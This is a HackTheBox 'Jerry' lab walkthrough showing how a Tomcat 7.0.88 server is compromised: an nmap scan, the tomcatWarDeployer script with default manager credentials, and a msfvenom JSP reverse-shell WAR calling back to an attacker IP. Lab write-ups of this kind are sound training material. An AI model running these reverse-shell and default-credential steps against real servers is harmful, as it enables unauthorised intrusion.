Today we are going to solve another HackTheBox machine “jerry” created by mrh4sh . Lab is mainly focus on exploitation of tomcat server .
Level : Easy
Attacking Strategy
- Network scanning
- Nmap
- Recon
- Tomcat enumeration
- Exploitation
- tomcat 7.0.88 exploit
- Virtual Environment setup
- Privilege Escalation
- Manual Exploitation
Walkthrough
IP address : 10.129.1.110
We start our journey by running the Nmap scan against the machine to enumerate the open port and services on machine .
Enumeration
nmap -sC -sV -p- 10.129.1.110 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 23:51 IST
Nmap scan report for 10.129.1.110
Host is up (0.16s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Nmap show the port 8080 port is open on which Apache Tomcat is running and the title also give the information about the version which is 7.0.88 which is exploitable. After doing some google we land to the exploit which you can get from GitHub. .
Exploitation

After reading the exploit and understand the flow of exploit we setup the virtual environment so that we can install pre dependencies to run our exploit.
git clone https://github.com/mgeeky/tomcatWarDeployer.git
virtualenv -p python2 venv
source venv/bin/activate
pip install -r requirements.txt

Once everything is set , we also need the credentials for tomcat server so after google we land on the GitHub page which provides some default credentials after trying some credentials we got it “admin:s3cret”. After successful exploit we got the administrative shell and we collect the flags .
python tomcatWarDeployer.py -U tomcat -P s3cret -H 10.10.14.79 -p 1234 10.129.1.110:8080 -x
type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"

Manual Exploit
You can also exploit without the need of tomcatwardeployer script for this we need to create the Metasploit payload and upload on the tomcat server.
Once login to the account , simply go to war file upload section and upload the payload file and deploy it .
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.79 LPORT=5454 -f war > shell.war


Once the payload successfully uploaded we call the payload using the curl and we got the session .


nice